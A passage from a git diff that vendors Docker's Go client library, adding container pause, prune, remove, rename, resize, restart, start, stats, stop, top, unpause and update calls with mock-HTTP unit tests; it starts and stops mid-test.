+					Body:       ioutil.NopCloser(bytes.NewReader([]byte("response"))),
+				}, nil
+			}),
+		}
+		body, err := client.ContainerLogs(context.Background(), "container_id", logCase.options)
+		if err != nil {
+			t.Fatal(err)
+		}
+		defer body.Close()
+		content, err := ioutil.ReadAll(body)
+		if err != nil {
+			t.Fatal(err)
+		}
+		if string(content) != "response" {
+			t.Fatalf("expected response to contain 'response', got %s", string(content))
+		}
+	}
+}
+
+func ExampleClient_ContainerLogs_withTimeout() {
+	ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
+	defer cancel()
+
+	client, _ := NewEnvClient()
+	reader, err := client.ContainerLogs(ctx, "container_id", types.ContainerLogsOptions{})
+	if err != nil {
+		log.Fatal(err)
+	}
+
+	_, err = io.Copy(os.Stdout, reader)
+	if err != nil && err != io.EOF {
+		log.Fatal(err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/container_pause.go b/vendor/github.com/docker/docker/client/container_pause.go
new file mode 100644
index 0000000000..412067a782
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/container_pause.go
@@ -0,0 +1,10 @@
+package client
+
+import "golang.org/x/net/context"
+
+// ContainerPause pauses the main process of a given container without terminating it.
+func (cli *Client) ContainerPause(ctx context.Context, containerID string) error {
+	resp, err := cli.post(ctx, "/containers/"+containerID+"/pause", nil, nil, nil)
+	ensureReaderClosed(resp)
+	return err
+}
diff --git a/vendor/github.com/docker/docker/client/container_pause_test.go b/vendor/github.com/docker/docker/client/container_pause_test.go
new file mode 100644
index 0000000000..0ee2f05d7e
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/container_pause_test.go
@@ -0,0 +1,41 @@
+package client
+
+import (
+	"bytes"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"golang.org/x/net/context"
+)
+
+func TestContainerPauseError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+	err := client.ContainerPause(context.Background(), "nothing")
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestContainerPause(t *testing.T) {
+	expectedURL := "/containers/container_id/pause"
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader([]byte(""))),
+			}, nil
+		}),
+	}
+	err := client.ContainerPause(context.Background(), "container_id")
+	if err != nil {
+		t.Fatal(err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/container_prune.go b/vendor/github.com/docker/docker/client/container_prune.go
new file mode 100644
index 0000000000..b582170867
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/container_prune.go
@@ -0,0 +1,36 @@
+package client
+
+import (
+	"encoding/json"
+	"fmt"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	"golang.org/x/net/context"
+)
+
+// ContainersPrune requests the daemon to delete unused data
+func (cli *Client) ContainersPrune(ctx context.Context, pruneFilters filters.Args) (types.ContainersPruneReport, error) {
+	var report types.ContainersPruneReport
+
+	if err := cli.NewVersionError("1.25", "container prune"); err != nil {
+		return report, err
+	}
+
+	query, err := getFiltersQuery(pruneFilters)
+	if err != nil {
+		return report, err
+	}
+
+	serverResp, err := cli.post(ctx, "/containers/prune", query, nil, nil)
+	if err != nil {
+		return report, err
+	}
+	defer ensureReaderClosed(serverResp)
+
+	if err := json.NewDecoder(serverResp.body).Decode(&report); err != nil {
+		return report, fmt.Errorf("Error retrieving disk usage: %v", err)
+	}
+
+	return report, nil
+}
diff --git a/vendor/github.com/docker/docker/client/container_remove.go b/vendor/github.com/docker/docker/client/container_remove.go
new file mode 100644
index 0000000000..3a79590ced
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/container_remove.go
@@ -0,0 +1,27 @@
+package client
+
+import (
+	"net/url"
+
+	"github.com/docker/docker/api/types"
+	"golang.org/x/net/context"
+)
+
+// ContainerRemove kills and removes a container from the docker host.
+func (cli *Client) ContainerRemove(ctx context.Context, containerID string, options types.ContainerRemoveOptions) error {
+	query := url.Values{}
+	if options.RemoveVolumes {
+		query.Set("v", "1")
+	}
+	if options.RemoveLinks {
+		query.Set("link", "1")
+	}
+
+	if options.Force {
+		query.Set("force", "1")
+	}
+
+	resp, err := cli.delete(ctx, "/containers/"+containerID, query, nil)
+	ensureReaderClosed(resp)
+	return err
+}
diff --git a/vendor/github.com/docker/docker/client/container_remove_test.go b/vendor/github.com/docker/docker/client/container_remove_test.go
new file mode 100644
index 0000000000..798c08b333
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/container_remove_test.go
@@ -0,0 +1,59 @@
+package client
+
+import (
+	"bytes"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"golang.org/x/net/context"
+)
+
+func TestContainerRemoveError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+	err := client.ContainerRemove(context.Background(), "container_id", types.ContainerRemoveOptions{})
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestContainerRemove(t *testing.T) {
+	expectedURL := "/containers/container_id"
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+			query := req.URL.Query()
+			volume := query.Get("v")
+			if volume != "1" {
+				return nil, fmt.Errorf("v (volume) not set in URL query properly. Expected '1', got %s", volume)
+			}
+			force := query.Get("force")
+			if force != "1" {
+				return nil, fmt.Errorf("force not set in URL query properly. Expected '1', got %s", force)
+			}
+			link := query.Get("link")
+			if link != "" {
+				return nil, fmt.Errorf("link should have not be present in query, go %s", link)
+			}
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader([]byte(""))),
+			}, nil
+		}),
+	}
+
+	err := client.ContainerRemove(context.Background(), "container_id", types.ContainerRemoveOptions{
+		RemoveVolumes: true,
+		Force:         true,
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/container_rename.go b/vendor/github.com/docker/docker/client/container_rename.go
new file mode 100644
index 0000000000..0e718da7c6
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/container_rename.go
@@ -0,0 +1,16 @@
+package client
+
+import (
+	"net/url"
+
+	"golang.org/x/net/context"
+)
+
+// ContainerRename changes the name of a given container.
+func (cli *Client) ContainerRename(ctx context.Context, containerID, newContainerName string) error {
+	query := url.Values{}
+	query.Set("name", newContainerName)
+	resp, err := cli.post(ctx, "/containers/"+containerID+"/rename", query, nil, nil)
+	ensureReaderClosed(resp)
+	return err
+}
diff --git a/vendor/github.com/docker/docker/client/container_rename_test.go b/vendor/github.com/docker/docker/client/container_rename_test.go
new file mode 100644
index 0000000000..732ebff5f7
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/container_rename_test.go
@@ -0,0 +1,46 @@
+package client
+
+import (
+	"bytes"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"golang.org/x/net/context"
+)
+
+func TestContainerRenameError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+	err := client.ContainerRename(context.Background(), "nothing", "newNothing")
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestContainerRename(t *testing.T) {
+	expectedURL := "/containers/container_id/rename"
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+			name := req.URL.Query().Get("name")
+			if name != "newName" {
+				return nil, fmt.Errorf("name not set in URL query properly. Expected 'newName', got %s", name)
+			}
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader([]byte(""))),
+			}, nil
+		}),
+	}
+
+	err := client.ContainerRename(context.Background(), "container_id", "newName")
+	if err != nil {
+		t.Fatal(err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/container_resize.go b/vendor/github.com/docker/docker/client/container_resize.go
new file mode 100644
index 0000000000..66c3cc1940
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/container_resize.go
@@ -0,0 +1,29 @@
+package client
+
+import (
+	"net/url"
+	"strconv"
+
+	"github.com/docker/docker/api/types"
+	"golang.org/x/net/context"
+)
+
+// ContainerResize changes the size of the tty for a container.
+func (cli *Client) ContainerResize(ctx context.Context, containerID string, options types.ResizeOptions) error {
+	return cli.resize(ctx, "/containers/"+containerID, options.Height, options.Width)
+}
+
+// ContainerExecResize changes the size of the tty for an exec process running inside a container.
+func (cli *Client) ContainerExecResize(ctx context.Context, execID string, options types.ResizeOptions) error {
+	return cli.resize(ctx, "/exec/"+execID, options.Height, options.Width)
+}
+
+func (cli *Client) resize(ctx context.Context, basePath string, height, width uint) error {
+	query := url.Values{}
+	query.Set("h", strconv.Itoa(int(height)))
+	query.Set("w", strconv.Itoa(int(width)))
+
+	resp, err := cli.post(ctx, basePath+"/resize", query, nil, nil)
+	ensureReaderClosed(resp)
+	return err
+}
diff --git a/vendor/github.com/docker/docker/client/container_resize_test.go b/vendor/github.com/docker/docker/client/container_resize_test.go
new file mode 100644
index 0000000000..5b2efecdce
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/container_resize_test.go
@@ -0,0 +1,82 @@
+package client
+
+import (
+	"bytes"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"golang.org/x/net/context"
+)
+
+func TestContainerResizeError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+	err := client.ContainerResize(context.Background(), "container_id", types.ResizeOptions{})
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestContainerExecResizeError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+	err := client.ContainerExecResize(context.Background(), "exec_id", types.ResizeOptions{})
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestContainerResize(t *testing.T) {
+	client := &Client{
+		client: newMockClient(resizeTransport("/containers/container_id/resize")),
+	}
+
+	err := client.ContainerResize(context.Background(), "container_id", types.ResizeOptions{
+		Height: 500,
+		Width:  600,
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+}
+
+func TestContainerExecResize(t *testing.T) {
+	client := &Client{
+		client: newMockClient(resizeTransport("/exec/exec_id/resize")),
+	}
+
+	err := client.ContainerExecResize(context.Background(), "exec_id", types.ResizeOptions{
+		Height: 500,
+		Width:  600,
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+}
+
+func resizeTransport(expectedURL string) func(req *http.Request) (*http.Response, error) {
+	return func(req *http.Request) (*http.Response, error) {
+		if !strings.HasPrefix(req.URL.Path, expectedURL) {
+			return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+		}
+		query := req.URL.Query()
+		h := query.Get("h")
+		if h != "500" {
+			return nil, fmt.Errorf("h not set in URL query properly. Expected '500', got %s", h)
+		}
+		w := query.Get("w")
+		if w != "600" {
+			return nil, fmt.Errorf("w not set in URL query properly. Expected '600', got %s", w)
+		}
+		return &http.Response{
+			StatusCode: http.StatusOK,
+			Body:       ioutil.NopCloser(bytes.NewReader([]byte(""))),
+		}, nil
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/container_restart.go b/vendor/github.com/docker/docker/client/container_restart.go
new file mode 100644
index 0000000000..74d7455f02
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/container_restart.go
@@ -0,0 +1,22 @@
+package client
+
+import (
+	"net/url"
+	"time"
+
+	timetypes "github.com/docker/docker/api/types/time"
+	"golang.org/x/net/context"
+)
+
+// ContainerRestart stops and starts a container again.
+// It makes the daemon to wait for the container to be up again for
+// a specific amount of time, given the timeout.
+func (cli *Client) ContainerRestart(ctx context.Context, containerID string, timeout *time.Duration) error {
+	query := url.Values{}
+	if timeout != nil {
+		query.Set("t", timetypes.DurationToSecondsString(*timeout))
+	}
+	resp, err := cli.post(ctx, "/containers/"+containerID+"/restart", query, nil, nil)
+	ensureReaderClosed(resp)
+	return err
+}
diff --git a/vendor/github.com/docker/docker/client/container_restart_test.go b/vendor/github.com/docker/docker/client/container_restart_test.go
new file mode 100644
index 0000000000..8c3cfd6a6f
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/container_restart_test.go
@@ -0,0 +1,48 @@
+package client
+
+import (
+	"bytes"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+	"time"
+
+	"golang.org/x/net/context"
+)
+
+func TestContainerRestartError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+	timeout := 0 * time.Second
+	err := client.ContainerRestart(context.Background(), "nothing", &timeout)
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestContainerRestart(t *testing.T) {
+	expectedURL := "/containers/container_id/restart"
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+			t := req.URL.Query().Get("t")
+			if t != "100" {
+				return nil, fmt.Errorf("t (timeout) not set in URL query properly. Expected '100', got %s", t)
+			}
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader([]byte(""))),
+			}, nil
+		}),
+	}
+	timeout := 100 * time.Second
+	err := client.ContainerRestart(context.Background(), "container_id", &timeout)
+	if err != nil {
+		t.Fatal(err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/container_start.go b/vendor/github.com/docker/docker/client/container_start.go
new file mode 100644
index 0000000000..b1f08de416
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/container_start.go
@@ -0,0 +1,24 @@
+package client
+
+import (
+	"net/url"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types"
+)
+
+// ContainerStart sends a request to the docker daemon to start a container.
+func (cli *Client) ContainerStart(ctx context.Context, containerID string, options types.ContainerStartOptions) error {
+	query := url.Values{}
+	if len(options.CheckpointID) != 0 {
+		query.Set("checkpoint", options.CheckpointID)
+	}
+	if len(options.CheckpointDir) != 0 {
+		query.Set("checkpoint-dir", options.CheckpointDir)
+	}
+
+	resp, err := cli.post(ctx, "/containers/"+containerID+"/start", query, nil, nil)
+	ensureReaderClosed(resp)
+	return err
+}
diff --git a/vendor/github.com/docker/docker/client/container_start_test.go b/vendor/github.com/docker/docker/client/container_start_test.go
new file mode 100644
index 0000000000..5826fa8bc7
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/container_start_test.go
@@ -0,0 +1,58 @@
+package client
+
+import (
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types"
+)
+
+func TestContainerStartError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+	err := client.ContainerStart(context.Background(), "nothing", types.ContainerStartOptions{})
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestContainerStart(t *testing.T) {
+	expectedURL := "/containers/container_id/start"
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+			// we're not expecting any payload, but if one is supplied, check it is valid.
+			if req.Header.Get("Content-Type") == "application/json" {
+				var startConfig interface{}
+				if err := json.NewDecoder(req.Body).Decode(&startConfig); err != nil {
+					return nil, fmt.Errorf("Unable to parse json: %s", err)
+				}
+			}
+
+			checkpoint := req.URL.Query().Get("checkpoint")
+			if checkpoint != "checkpoint_id" {
+				return nil, fmt.Errorf("checkpoint not set in URL query properly. Expected 'checkpoint_id', got %s", checkpoint)
+			}
+
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader([]byte(""))),
+			}, nil
+		}),
+	}
+
+	err := client.ContainerStart(context.Background(), "container_id", types.ContainerStartOptions{CheckpointID: "checkpoint_id"})
+	if err != nil {
+		t.Fatal(err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/container_stats.go b/vendor/github.com/docker/docker/client/container_stats.go
new file mode 100644
index 0000000000..4758c66e32
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/container_stats.go
@@ -0,0 +1,26 @@
+package client
+
+import (
+	"net/url"
+
+	"github.com/docker/docker/api/types"
+	"golang.org/x/net/context"
+)
+
+// ContainerStats returns near realtime stats for a given container.
+// It's up to the caller to close the io.ReadCloser returned.
+func (cli *Client) ContainerStats(ctx context.Context, containerID string, stream bool) (types.ContainerStats, error) {
+	query := url.Values{}
+	query.Set("stream", "0")
+	if stream {
+		query.Set("stream", "1")
+	}
+
+	resp, err := cli.get(ctx, "/containers/"+containerID+"/stats", query, nil)
+	if err != nil {
+		return types.ContainerStats{}, err
+	}
+
+	osType := getDockerOS(resp.header.Get("Server"))
+	return types.ContainerStats{Body: resp.body, OSType: osType}, err
+}
diff --git a/vendor/github.com/docker/docker/client/container_stats_test.go b/vendor/github.com/docker/docker/client/container_stats_test.go
new file mode 100644
index 0000000000..7414f135c3
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/container_stats_test.go
@@ -0,0 +1,70 @@
+package client
+
+import (
+	"bytes"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"golang.org/x/net/context"
+)
+
+func TestContainerStatsError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+	_, err := client.ContainerStats(context.Background(), "nothing", false)
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestContainerStats(t *testing.T) {
+	expectedURL := "/containers/container_id/stats"
+	cases := []struct {
+		stream         bool
+		expectedStream string
+	}{
+		{
+			expectedStream: "0",
+		},
+		{
+			stream:         true,
+			expectedStream: "1",
+		},
+	}
+	for _, c := range cases {
+		client := &Client{
+			client: newMockClient(func(r *http.Request) (*http.Response, error) {
+				if !strings.HasPrefix(r.URL.Path, expectedURL) {
+					return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, r.URL)
+				}
+
+				query := r.URL.Query()
+				stream := query.Get("stream")
+				if stream != c.expectedStream {
+					return nil, fmt.Errorf("stream not set in URL query properly. Expected '%s', got %s", c.expectedStream, stream)
+				}
+
+				return &http.Response{
+					StatusCode: http.StatusOK,
+					Body:       ioutil.NopCloser(bytes.NewReader([]byte("response"))),
+				}, nil
+			}),
+		}
+		resp, err := client.ContainerStats(context.Background(), "container_id", c.stream)
+		if err != nil {
+			t.Fatal(err)
+		}
+		defer resp.Body.Close()
+		content, err := ioutil.ReadAll(resp.Body)
+		if err != nil {
+			t.Fatal(err)
+		}
+		if string(content) != "response" {
+			t.Fatalf("expected response to contain 'response', got %s", string(content))
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/container_stop.go b/vendor/github.com/docker/docker/client/container_stop.go
new file mode 100644
index 0000000000..b5418ae8c8
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/container_stop.go
@@ -0,0 +1,21 @@
+package client
+
+import (
+	"net/url"
+	"time"
+
+	timetypes "github.com/docker/docker/api/types/time"
+	"golang.org/x/net/context"
+)
+
+// ContainerStop stops a container without terminating the process.
+// The process is blocked until the container stops or the timeout expires.
+func (cli *Client) ContainerStop(ctx context.Context, containerID string, timeout *time.Duration) error {
+	query := url.Values{}
+	if timeout != nil {
+		query.Set("t", timetypes.DurationToSecondsString(*timeout))
+	}
+	resp, err := cli.post(ctx, "/containers/"+containerID+"/stop", query, nil, nil)
+	ensureReaderClosed(resp)
+	return err
+}
diff --git a/vendor/github.com/docker/docker/client/container_stop_test.go b/vendor/github.com/docker/docker/client/container_stop_test.go
new file mode 100644
index 0000000000..c32cd691c4
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/container_stop_test.go
@@ -0,0 +1,48 @@
+package client
+
+import (
+	"bytes"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+	"time"
+
+	"golang.org/x/net/context"
+)
+
+func TestContainerStopError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+	timeout := 0 * time.Second
+	err := client.ContainerStop(context.Background(), "nothing", &timeout)
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestContainerStop(t *testing.T) {
+	expectedURL := "/containers/container_id/stop"
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+			t := req.URL.Query().Get("t")
+			if t != "100" {
+				return nil, fmt.Errorf("t (timeout) not set in URL query properly. Expected '100', got %s", t)
+			}
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader([]byte(""))),
+			}, nil
+		}),
+	}
+	timeout := 100 * time.Second
+	err := client.ContainerStop(context.Background(), "container_id", &timeout)
+	if err != nil {
+		t.Fatal(err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/container_top.go b/vendor/github.com/docker/docker/client/container_top.go
new file mode 100644
index 0000000000..4e7270ea22
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/container_top.go
@@ -0,0 +1,28 @@
+package client
+
+import (
+	"encoding/json"
+	"net/url"
+	"strings"
+
+	"github.com/docker/docker/api/types"
+	"golang.org/x/net/context"
+)
+
+// ContainerTop shows process information from within a container.
+func (cli *Client) ContainerTop(ctx context.Context, containerID string, arguments []string) (types.ContainerProcessList, error) {
+	var response types.ContainerProcessList
+	query := url.Values{}
+	if len(arguments) > 0 {
+		query.Set("ps_args", strings.Join(arguments, " "))
+	}
+
+	resp, err := cli.get(ctx, "/containers/"+containerID+"/top", query, nil)
+	if err != nil {
+		return response, err
+	}
+
+	err = json.NewDecoder(resp.body).Decode(&response)
+	ensureReaderClosed(resp)
+	return response, err
+}
diff --git a/vendor/github.com/docker/docker/client/container_top_test.go b/vendor/github.com/docker/docker/client/container_top_test.go
new file mode 100644
index 0000000000..7802be063e
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/container_top_test.go
@@ -0,0 +1,74 @@
+package client
+
+import (
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"reflect"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"golang.org/x/net/context"
+)
+
+func TestContainerTopError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+	_, err := client.ContainerTop(context.Background(), "nothing", []string{})
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestContainerTop(t *testing.T) {
+	expectedURL := "/containers/container_id/top"
+	expectedProcesses := [][]string{
+		{"p1", "p2"},
+		{"p3"},
+	}
+	expectedTitles := []string{"title1", "title2"}
+
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+			query := req.URL.Query()
+			args := query.Get("ps_args")
+			if args != "arg1 arg2" {
+				return nil, fmt.Errorf("args not set in URL query properly. Expected 'arg1 arg2', got %v", args)
+			}
+
+			b, err := json.Marshal(types.ContainerProcessList{
+				Processes: [][]string{
+					{"p1", "p2"},
+					{"p3"},
+				},
+				Titles: []string{"title1", "title2"},
+			})
+			if err != nil {
+				return nil, err
+			}
+
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader(b)),
+			}, nil
+		}),
+	}
+
+	processList, err := client.ContainerTop(context.Background(), "container_id", []string{"arg1", "arg2"})
+	if err != nil {
+		t.Fatal(err)
+	}
+	if !reflect.DeepEqual(expectedProcesses, processList.Processes) {
+		t.Fatalf("Processes: expected %v, got %v", expectedProcesses, processList.Processes)
+	}
+	if !reflect.DeepEqual(expectedTitles, processList.Titles) {
+		t.Fatalf("Titles: expected %v, got %v", expectedTitles, processList.Titles)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/container_unpause.go b/vendor/github.com/docker/docker/client/container_unpause.go
new file mode 100644
index 0000000000..5c76211256
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/container_unpause.go
@@ -0,0 +1,10 @@
+package client
+
+import "golang.org/x/net/context"
+
+// ContainerUnpause resumes the process execution within a container
+func (cli *Client) ContainerUnpause(ctx context.Context, containerID string) error {
+	resp, err := cli.post(ctx, "/containers/"+containerID+"/unpause", nil, nil, nil)
+	ensureReaderClosed(resp)
+	return err
+}
diff --git a/vendor/github.com/docker/docker/client/container_unpause_test.go b/vendor/github.com/docker/docker/client/container_unpause_test.go
new file mode 100644
index 0000000000..2c42727191
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/container_unpause_test.go
@@ -0,0 +1,41 @@
+package client
+
+import (
+	"bytes"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"golang.org/x/net/context"
+)
+
+func TestContainerUnpauseError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+	err := client.ContainerUnpause(context.Background(), "nothing")
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestContainerUnpause(t *testing.T) {
+	expectedURL := "/containers/container_id/unpause"
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader([]byte(""))),
+			}, nil
+		}),
+	}
+	err := client.ContainerUnpause(context.Background(), "container_id")
+	if err != nil {
+		t.Fatal(err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/container_update.go b/vendor/github.com/docker/docker/client/container_update.go
new file mode 100644
index 0000000000..5082f22dfa
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/container_update.go
@@ -0,0 +1,22 @@
+package client
+
+import (
+	"encoding/json"
+
+	"github.com/docker/docker/api/types/container"
+	"golang.org/x/net/context"
+)
+
+// ContainerUpdate updates resources of a container
+func (cli *Client) ContainerUpdate(ctx context.Context, containerID string, updateConfig container.UpdateConfig) (container.ContainerUpdateOKBody, error) {
+	var response container.ContainerUpdateOKBody
+	serverResp, err := cli.post(ctx, "/containers/"+containerID+"/update", nil, updateConfig, nil)
+	if err != nil {
+		return response, err
+	}
+
+	err = json.NewDecoder(serverResp.body).Decode(&response)
+
+	ensureReaderClosed(serverResp)
+	return response, err
+}
diff --git a/vendor/github.com/docker/docker/client/container_update_test.go b/vendor/github.com/docker/docker/client/container_update_test.go
new file mode 100644
index 0000000000..715bb7ca23
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/container_update_test.go
@@ -0,0 +1,58 @@
+package client
+
+import (
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types/container"
+	"golang.org/x/net/context"
+)
+
+func TestContainerUpdateError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+	_, err := client.ContainerUpdate(context.Background(), "nothing", container.UpdateConfig{})
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestContainerUpdate(t *testing.T) {
+	expectedURL := "/containers/container_id/update"
+
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+
+			b, err := json.Marshal(container.ContainerUpdateOKBody{})
+			if err != nil {
+				return nil, err
+			}
+
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader(b)),
+			}, nil
+		}),
+	}
+
